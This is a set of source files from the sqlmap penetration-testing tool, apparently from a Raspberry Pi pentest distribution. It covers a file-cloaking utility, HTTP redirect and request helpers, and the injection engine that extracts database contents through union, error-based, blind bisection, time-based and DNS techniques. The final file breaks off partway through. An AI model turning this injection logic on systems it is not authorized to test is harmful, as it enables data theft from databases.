18,943
cloak.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/cloak/cloak.py
#!/usr/bin/env python """ cloak.py - Simple file encryption/compression utility Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import sys import zlib from optparse import OptionError from optparse import OptionParser def hideAscii(data): retVal = "" for i in xrange(len(data)): if ord(data[i]) < 128: retVal += chr(ord(data[i]) ^ 127) else: retVal += data[i] return retVal def cloak(inputFile): f = open(inputFile, 'rb') data = zlib.compress(f.read()) f.close() return hideAscii(data) def decloak(inputFile): f = open(inputFile, 'rb') try: data = zlib.decompress(hideAscii(f.read())) except: print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile sys.exit(1) finally: f.close() return data def main(): usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0] parser = OptionParser(usage=usage, version='0.1') try: parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt') parser.add_option('-i', dest='inputFile', help='Input file') parser.add_option('-o', dest='outputFile', help='Output file') (args, _) = parser.parse_args() if not args.inputFile: parser.error('Missing the input file, -h for help') except (OptionError, TypeError), e: parser.error(e) if not os.path.isfile(args.inputFile): print 'ERROR: the provided input file \'%s\' is nonexistent' % args.inputFile sys.exit(1) if not args.decrypt: data = cloak(args.inputFile) else: data = decloak(args.inputFile) if not args.outputFile: if not args.decrypt: args.outputFile = args.inputFile + '_' else: args.outputFile = args.inputFile[:-1] f = open(args.outputFile, 'wb') f.write(data) f.close() if __name__ == '__main__': main()
2,061
Python
.py
63
26.634921
104
0.624368
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
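hideAscii() above is an involution: XORing a 7-bit byte with 127 twice restores it, and bytes >= 128 pass through untouched, so decloaking is just the same transform plus zlib.decompress. A round-trip sketch (Python 2):

import zlib

def hide_ascii(data):
    # XOR 7-bit bytes with 127; leave high bytes untouched (as in cloak.py)
    return "".join(chr(ord(c) ^ 127) if ord(c) < 128 else c for c in data)

blob = hide_ascii(zlib.compress("secret payload"))
assert zlib.decompress(hide_ascii(blob)) == "secret payload"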
18,944
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/cloak/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,945
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,946
redirecthandler.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/redirecthandler.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import urllib2 import urlparse from StringIO import StringIO from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.common import getHostHeader from lib.core.common import getUnicode from lib.core.common import logHTTPTraffic from lib.core.common import readInput from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD from lib.core.enums import REDIRECTION from lib.core.exception import SqlmapConnectionException from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE from lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS from lib.core.settings import MAX_TOTAL_REDIRECTIONS from lib.core.threads import getCurrentThreadData from lib.request.basic import decodePage class SmartRedirectHandler(urllib2.HTTPRedirectHandler): def _get_header_redirect(self, headers): retVal = None if headers: if "location" in headers: retVal = headers.getheaders("location")[0].split("?")[0] elif "uri" in headers: retVal = headers.getheaders("uri")[0].split("?")[0] return retVal def _ask_redirect_choice(self, redcode, redurl, method): with kb.locks.redirect: if kb.redirectChoice is None: msg = "sqlmap got a %d redirect to " % redcode msg += "'%s'. Do you want to follow? [Y/n] " % redurl choice = readInput(msg, default="Y") kb.redirectChoice = choice.upper() if kb.redirectChoice == REDIRECTION.YES and method == HTTPMETHOD.POST and kb.resendPostOnRedirect is None: msg = "redirect is a result of a " msg += "POST request. Do you want to " msg += "resend original POST data to a new " msg += "location? 
[%s] " % ("Y/n" if not kb.originalPage else "y/N") choice = readInput(msg, default=("Y" if not kb.originalPage else "N")) kb.resendPostOnRedirect = choice.upper() == 'Y' if kb.resendPostOnRedirect: self.redirect_request = self._redirect_request def _redirect_request(self, req, fp, code, msg, headers, newurl): newurl = newurl.replace(' ', '%20') return urllib2.Request(newurl, data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host()) def http_error_302(self, req, fp, code, msg, headers): content = None redurl = self._get_header_redirect(headers) try: content = fp.read(MAX_CONNECTION_TOTAL_SIZE) except Exception, msg: dbgMsg = "there was a problem while retrieving " dbgMsg += "redirect response content (%s)" % msg logger.debug(dbgMsg) finally: if content: try: # try to write it back to the read buffer so we could reuse it in further steps fp.fp._rbuf.truncate(0) fp.fp._rbuf.write(content) except: pass content = decodePage(content, headers.get(HTTP_HEADER.CONTENT_ENCODING), headers.get(HTTP_HEADER.CONTENT_TYPE)) threadData = getCurrentThreadData() threadData.lastRedirectMsg = (threadData.lastRequestUID, content) redirectMsg = "HTTP redirect " redirectMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, getUnicode(msg)) if headers: logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in headers.items()) else: logHeaders = "" redirectMsg += logHeaders if content: redirectMsg += "\n\n%s" % getUnicode(content[:MAX_CONNECTION_CHUNK_SIZE]) logHTTPTraffic(threadData.lastRequestMsg, redirectMsg) logger.log(CUSTOM_LOGGING.TRAFFIC_IN, redirectMsg) if redurl: try: if not urlparse.urlsplit(redurl).netloc: redurl = urlparse.urljoin(req.get_full_url(), redurl) self._infinite_loop_check(req) self._ask_redirect_choice(code, redurl, req.get_method()) except ValueError: redurl = None result = fp if redurl and kb.redirectChoice == REDIRECTION.YES: req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl) if headers and HTTP_HEADER.SET_COOKIE in headers: req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0] try: result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers) except: redurl = None result = fp fp.read = StringIO("").read else: result = fp threadData.lastRedirectURL = (threadData.lastRequestUID, redurl) result.redcode = code result.redurl = redurl return result http_error_301 = http_error_303 = http_error_307 = http_error_302 def _infinite_loop_check(self, req): if hasattr(req, 'redirect_dict') and (req.redirect_dict.get(req.get_full_url(), 0) >= MAX_SINGLE_URL_REDIRECTIONS or len(req.redirect_dict) >= MAX_TOTAL_REDIRECTIONS): errMsg = "infinite redirect loop detected (%s). " % ", ".join(item for item in req.redirect_dict.keys()) errMsg += "Please check all provided parameters and/or provide missing ones" raise SqlmapConnectionException(errMsg)
5,911
Python
.py
116
40.853448
175
0.641581
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
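SmartRedirectHandler above plugs into urllib2's opener chain; the generic wiring looks like this (Python 2; MyHandler is a stand-in for illustration, not sqlmap code):

import urllib2

class MyHandler(urllib2.HTTPRedirectHandler):
    def http_error_302(self, req, fp, code, msg, headers):
        # inspect (or rewrite) the redirect before following it
        print "redirected to:", headers.get("location")
        return urllib2.HTTPRedirectHandler.http_error_302(
            self, req, fp, code, msg, headers)
    http_error_301 = http_error_302

opener = urllib2.build_opener(MyHandler())
urllib2.install_opener(opener)    # urllib2.urlopen() now uses MyHandler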
18,947
templates.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/templates.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.data import kb from lib.request.connect import Connect as Request def getPageTemplate(payload, place): retVal = (kb.originalPage, kb.errorIsNone) if payload and place: if (payload, place) not in kb.pageTemplates: page, _ = Request.queryPage(payload, place, content=True, raise404=False) kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None) retVal = kb.pageTemplates[(payload, place)] return retVal
634
Python
.py
15
37.333333
85
0.715686
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,948
methodrequest.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/methodrequest.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import urllib2 class MethodRequest(urllib2.Request): ''' Used to create HEAD/PUT/DELETE/... requests with urllib2 ''' def set_method(self, method): self.method = method.upper() def get_method(self): return getattr(self, 'method', urllib2.Request.get_method(self))
449
Python
.py
14
28.071429
72
0.699301
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
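MethodRequest works because urllib2 asks the request object for its HTTP verb via get_method(); a self-contained usage sketch (Python 2, the URL is illustrative):

import urllib2

class MethodRequest(urllib2.Request):
    # same pattern as lib/request/methodrequest.py
    def set_method(self, method):
        self.method = method.upper()
    def get_method(self):
        return getattr(self, 'method', urllib2.Request.get_method(self))

req = MethodRequest("http://example.com/resource")
req.set_method("HEAD")
# urllib2.urlopen(req) would now issue a HEAD request instead of GET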
18,949
inject.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/inject.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import re import time from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import cleanQuery from lib.core.common import expandAsteriskForColumns from lib.core.common import extractExpectedValue from lib.core.common import getPublicTypeMembers from lib.core.common import getTechniqueData from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import initTechnique from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import parseUnionPage from lib.core.common import popValue from lib.core.common import pushValue from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import singleTimeWarnMessage from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapNotVulnerableException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import MAX_TECHNIQUES_PER_VALUE from lib.core.settings import SQL_SCALAR_REGEX from lib.core.threads import getCurrentThreadData from lib.request.connect import Connect as Request from lib.request.direct import direct from lib.techniques.blind.inference import bisection from lib.techniques.blind.inference import queryOutputLength from lib.techniques.dns.test import dnsTest from lib.techniques.dns.use import dnsUse from lib.techniques.error.use import errorUse from lib.techniques.union.use import unionUse def _goDns(payload, expression): value = None if conf.dnsName and kb.dnsTest is not False and not kb.testMode and Backend.getDbms() is not None: if kb.dnsTest is None: dnsTest(payload) if kb.dnsTest: value = dnsUse(payload, expression) return value def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar=None, dump=False, field=None): start = time.time() value = None count = 0 value = _goDns(payload, expression) if value is not None: return value timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) if not (timeBasedCompare and kb.dnsTest): if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not timeBasedCompare: if field and re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I): expression = "SELECT %s FROM (%s)" % (field, expression) if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): expression += " AS %s" % randomStr(lowercase=True, seed=hash(expression)) if field and conf.hexConvert or conf.binaryFields and field in conf.binaryFields.split(','): nulledCastedField = agent.nullAndCastField(field) injExpression = expression.replace(field, nulledCastedField, 1) else: injExpression = expression length = queryOutputLength(injExpression, payload) else: length = None kb.inferenceMode = True count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump) kb.inferenceMode = 
False if not kb.bruteMode: debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) logger.debug(debugMsg) return value def _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=None, charsetType=None, firstChar=None, lastChar=None, dump=False): outputs = [] origExpr = None for field in expressionFieldsList: output = None if field.startswith("ROWNUM "): continue if isinstance(num, int): origExpr = expression expression = agent.limitQuery(num, expression, field, expressionFieldsList[0]) if "ROWNUM" in expressionFieldsList: expressionReplaced = expression else: expressionReplaced = expression.replace(expressionFields, field, 1) output = _goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field) if isinstance(num, int): expression = origExpr outputs.append(output) return outputs def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, charsetType=None, firstChar=None, lastChar=None, dump=False): """ Retrieve the output of a SQL query character by character taking advantage of a blind SQL injection vulnerability on the affected parameter through a bisection algorithm. """ initTechnique(kb.technique) query = agent.prefixQuery(kb.injection.data[kb.technique].vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) count = None startLimit = 0 stopLimit = None outputs = BigArray() if not unpack: return _goInference(payload, expression, charsetType, firstChar, lastChar, dump) _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) rdbRegExp = re.search("RDB\$GET_CONTEXT\([^)]+\)", expression, re.I) if rdbRegExp and Backend.isDbms(DBMS.FIREBIRD): expressionFieldsList = [expressionFields] if len(expressionFieldsList) > 1: infoMsg = "the SQL query provided has more than one field. 
" infoMsg += "sqlmap will now unpack it into distinct queries " infoMsg += "to be able to retrieve the output even if we " infoMsg += "are going blind" logger.info(infoMsg) # If we have been here from SQL query/shell we have to check if # the SQL query might return multiple entries and in such case # forge the SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table # can return multiple entries if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression) if limitCond: test = True if not stopLimit or stopLimit <= 1: if Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]): test = False if test: # Count the number of SQL query entries output countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0] countedExpression = expression.replace(expressionFields, countFirstField, 1) if " ORDER BY " in expression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] if not stopLimit: count = _goInference(payload, countedExpression, charsetType=CHARSET_TYPE.DIGITS, firstChar=firstChar, lastChar=lastChar) if isNumPosStrValue(count): count = int(count) if batch or count == 1: stopLimit = count else: message = "the SQL query provided can return " message += "%d entries. How many " % count message += "entries do you want to retrieve?\n" message += "[a] All (default)\n[#] Specific number\n" message += "[q] Quit" test = readInput(message, default="a") if not test or test[0] in ("a", "A"): stopLimit = count elif test[0] in ("q", "Q"): raise SqlmapUserQuitException elif test.isdigit() and int(test) > 0 and int(test) <= count: stopLimit = int(test) infoMsg = "sqlmap is now going to retrieve the " infoMsg += "first %d query output entries" % stopLimit logger.info(infoMsg) elif test[0] in ("#", "s", "S"): message = "how many? " stopLimit = readInput(message, default="10") if not stopLimit.isdigit(): errMsg = "invalid choice" logger.error(errMsg) return None else: stopLimit = int(stopLimit) else: errMsg = "invalid choice" logger.error(errMsg) return None elif count and not count.isdigit(): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. 
" warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) return None elif (not stopLimit or stopLimit == 0): return None try: for num in xrange(startLimit, stopLimit): output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) outputs.append(output) except KeyboardInterrupt: print warnMsg = "user aborted during dumping phase" logger.warn(warnMsg) return outputs elif Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().startswith("SELECT ") and " FROM " not in expression.upper(): expression += FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()] outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) return ", ".join(output for output in outputs) if not isNoneValue(outputs) else None def _goBooleanProxy(expression): """ Retrieve the output of a boolean based SQL query """ initTechnique(kb.technique) if conf.dnsName: query = agent.prefixQuery(kb.injection.data[kb.technique].vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) output = _goDns(payload, expression) if output is not None: return output vector = kb.injection.data[kb.technique].vector vector = vector.replace("[INFERENCE]", expression) query = agent.prefixQuery(vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) timeBasedCompare = kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) output = hashDBRetrieve(expression, checkConf=True) if output is None: output = Request.queryPage(payload, timeBasedCompare=timeBasedCompare, raise404=False) if output is not None: hashDBWrite(expression, output) return output def _goUnion(expression, unpack=True, dump=False): """ Retrieve the output of a SQL query taking advantage of an union SQL injection vulnerability on the affected parameter. """ output = unionUse(expression, unpack=unpack, dump=dump) if isinstance(output, basestring): output = parseUnionPage(output) return output def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True): """ Called each time sqlmap inject a SQL query on the SQL injection affected parameter. 
""" if conf.hexConvert: charsetType = CHARSET_TYPE.HEXADECIMAL kb.safeCharEncode = safeCharEncode kb.resumeValues = resumeValue if suppressOutput is not None: pushValue(getCurrentThreadData().disableStdOut) getCurrentThreadData().disableStdOut = suppressOutput try: pushValue(conf.db) pushValue(conf.tbl) if expected == EXPECTED.BOOL: forgeCaseExpression = booleanExpression = expression if expression.upper().startswith("SELECT "): booleanExpression = "(%s)=%s" % (booleanExpression, "'1'" if "'1'" in booleanExpression else "1") else: forgeCaseExpression = agent.forgeCaseStatement(expression) if conf.direct: value = direct(forgeCaseExpression if expected == EXPECTED.BOOL else expression) elif any(map(isTechniqueAvailable, getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True))): query = cleanQuery(expression) query = expandAsteriskForColumns(query) value = None found = False count = 0 if query and not re.search(r"COUNT.*FROM.*\(.*DISTINCT", query, re.I): query = query.replace("DISTINCT ", "") if not conf.forceDns: if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): kb.technique = PAYLOAD.TECHNIQUE.UNION kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8] fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion try: value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) except SqlmapConnectionException: if not fallback: raise count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE if not found and fallback: warnMsg = "something went wrong with full UNION " warnMsg += "technique (could be because of " warnMsg += "limitation on retrieved number of entries)" if " FROM " in query.upper(): warnMsg += ". 
Falling back to partial UNION technique" singleTimeWarnMessage(warnMsg) pushValue(kb.forcePartialUnion) kb.forcePartialUnion = True value = _goUnion(query, unpack, dump) found = (value is not None) or (value is None and expectingNone) kb.forcePartialUnion = popValue() else: singleTimeWarnMessage(warnMsg) if error and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) and not found: kb.technique = PAYLOAD.TECHNIQUE.ERROR if isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) else PAYLOAD.TECHNIQUE.QUERY value = errorUse(forgeCaseExpression if expected == EXPECTED.BOOL else query, dump) count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE if found and conf.dnsName: _ = "".join(filter(None, (key if isTechniqueAvailable(value) else None for key, value in {"E": PAYLOAD.TECHNIQUE.ERROR, "Q": PAYLOAD.TECHNIQUE.QUERY, "U": PAYLOAD.TECHNIQUE.UNION}.items()))) warnMsg = "option '--dns-domain' will be ignored " warnMsg += "as faster techniques are usable " warnMsg += "(%s) " % _ singleTimeWarnMessage(warnMsg) if blind and isTechniqueAvailable(PAYLOAD.TECHNIQUE.BOOLEAN) and not found: kb.technique = PAYLOAD.TECHNIQUE.BOOLEAN if expected == EXPECTED.BOOL: value = _goBooleanProxy(booleanExpression) else: value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found: if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME): kb.technique = PAYLOAD.TECHNIQUE.TIME else: kb.technique = PAYLOAD.TECHNIQUE.STACKED if expected == EXPECTED.BOOL: value = _goBooleanProxy(booleanExpression) else: value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) else: errMsg = "none of the injection types identified can be " errMsg += "leveraged to retrieve queries output" raise SqlmapNotVulnerableException(errMsg) finally: kb.resumeValues = True conf.tbl = popValue() conf.db = popValue() if suppressOutput is not None: getCurrentThreadData().disableStdOut = popValue() kb.safeCharEncode = False if not kb.testMode and value is None and Backend.getDbms() and conf.dbmsHandler and not conf.noCast and not conf.hexConvert: warnMsg = "in case of continuous data retrieval problems you are advised to try " warnMsg += "a switch '--no-cast' " warnMsg += "or switch '--hex'" if Backend.getIdentifiedDbms() not in (DBMS.ACCESS, DBMS.FIREBIRD) else "" singleTimeWarnMessage(warnMsg) return extractExpectedValue(value, expected) def goStacked(expression, silent=False): if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data: kb.technique = PAYLOAD.TECHNIQUE.STACKED else: for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True): _ = getTechniqueData(technique) if _ and "stacked" in _["title"].lower(): kb.technique = technique break expression = cleanQuery(expression) if conf.direct: return direct(expression) query = agent.prefixQuery(";%s" % expression) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True) def checkBooleanExpression(expression, expectingNone=True): return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone)
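# ---------------------------------------------------------------------
# Editor's note (illustrative addition, not part of the original file):
# a minimal, self-contained sketch of the bisection idea that
# bisection()/_goInference() above rely on. Each character of the query
# output is recovered by binary-searching its code point against a
# boolean oracle, one request per halving. The `oracle` callable is a
# hypothetical stand-in for a blind-injection round trip such as
# Request.queryPage().

def _bisect_char(oracle, position, low=0, high=127):
    # Invariant: the code point at `position` lies in [low, high]
    while low < high:
        mid = (low + high) // 2
        # oracle(position, mid) emulates a payload along the lines of
        # ASCII(SUBSTRING((query), position, 1)) > mid
        if oracle(position, mid):
            low = mid + 1
        else:
            high = mid
    return low

# Local usage example (no network involved):
#   secret = "abc"
#   oracle = lambda pos, mid: ord(secret[pos]) > mid
#   "".join(chr(_bisect_char(oracle, _)) for _ in xrange(3))  # -> "abc"
# ---------------------------------------------------------------------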
20,405
Python
.py
371
42.3531
271
0.633991
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,950
connect.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/connect.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import httplib
import json
import logging
import re
import socket
import string
import time
import traceback
import urllib2
import urlparse

from extra.safe2bin.safe2bin import safecharencode
from lib.core.agent import agent
from lib.core.common import asciifyUrl
from lib.core.common import calculateDeltaSeconds
from lib.core.common import clearConsoleLine
from lib.core.common import cpuThrottle
from lib.core.common import dataToStdout
from lib.core.common import evaluateCode
from lib.core.common import extractRegexResult
from lib.core.common import findMultipartPostBoundary
from lib.core.common import getCurrentThreadData
from lib.core.common import getHostHeader
from lib.core.common import getRequestHeader
from lib.core.common import getUnicode
from lib.core.common import logHTTPTraffic
from lib.core.common import pushValue
from lib.core.common import popValue
from lib.core.common import randomizeParameterValue
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import removeReflectiveValues
from lib.core.common import singleTimeLogMessage
from lib.core.common import singleTimeWarnMessage
from lib.core.common import stdev
from lib.core.common import wasLastResponseDelayed
from lib.core.common import unicodeencode
from lib.core.common import urldecode
from lib.core.common import urlencode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.dicts import POST_HINT_CONTENT_TYPES
from lib.core.enums import ADJUST_TIME_DELAY
from lib.core.enums import AUTH_TYPE
from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import HTTP_HEADER
from lib.core.enums import HTTPMETHOD
from lib.core.enums import NULLCONNECTION
from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
from lib.core.enums import POST_HINT
from lib.core.enums import REDIRECTION
from lib.core.enums import WEB_API
from lib.core.exception import SqlmapCompressionException
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import SqlmapTokenException
from lib.core.exception import SqlmapValueException
from lib.core.settings import ASTERISK_MARKER
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_CONTENT_TYPE
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE
from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE
from lib.core.settings import MAX_CONNECTIONS_REGEX
from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
from lib.core.settings import META_REFRESH_REGEX
from lib.core.settings import MIN_TIME_RESPONSES
from lib.core.settings import IS_WIN
from lib.core.settings import LARGE_CHUNK_TRIM_MARKER
from lib.core.settings import PAYLOAD_DELIMITER
from lib.core.settings import PERMISSION_DENIED_REGEX
from lib.core.settings import PLAIN_TEXT_CONTENT_TYPE
from lib.core.settings import REPLACEMENT_MARKER
from lib.core.settings import TEXT_CONTENT_TYPE_REGEX
from lib.core.settings import UNENCODED_ORIGINAL_VALUE
from lib.core.settings import URI_HTTP_HEADER
from lib.core.settings import WARN_TIME_STDEV
from lib.request.basic import decodePage
from lib.request.basic import forgeHeaders
from lib.request.basic import processResponse
from lib.request.direct import direct
from lib.request.comparison import comparison
from lib.request.methodrequest import MethodRequest
from thirdparty.multipart import multipartpost
from thirdparty.odict.odict import OrderedDict
from thirdparty.socks.socks import ProxyError

class Connect(object):
    """
    This class defines methods used to perform HTTP requests
    """

    @staticmethod
    def _getPageProxy(**kwargs):
        return Connect.getPage(**kwargs)

    @staticmethod
    def _retryProxy(**kwargs):
        threadData = getCurrentThreadData()
        threadData.retriesCount += 1

        if conf.proxyList and threadData.retriesCount >= conf.retries:
            warnMsg = "changing proxy"
            logger.warn(warnMsg)

            conf.proxy = None
            setHTTPProxy()

        if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME:
            # time-based payloads can cause web server unresponsiveness
            # if the injectable piece of code is some kind of JOIN-like query
            warnMsg = "most probably web server instance hasn't recovered yet "
            warnMsg += "from previous time-based payload. If the problem "
            warnMsg += "persists please wait for few minutes and rerun "
            warnMsg += "without flag T in option '--technique' "
            warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to "
            warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')"
            singleTimeWarnMessage(warnMsg)

        elif kb.originalPage is None:
            if conf.tor:
                warnMsg = "please make sure that you have "
                warnMsg += "Tor installed and running so "
                warnMsg += "you could successfully use "
                warnMsg += "switch '--tor' "
                if IS_WIN:
                    warnMsg += "(e.g. 'https://www.torproject.org/download/download.html.en')"
                else:
                    warnMsg += "(e.g. 'https://help.ubuntu.com/community/Tor')"
            else:
                warnMsg = "if the problem persists please check that the provided "
                warnMsg += "target URL is valid. In case that it is, you can try to rerun "
                warnMsg += "with the switch '--random-agent' turned on "
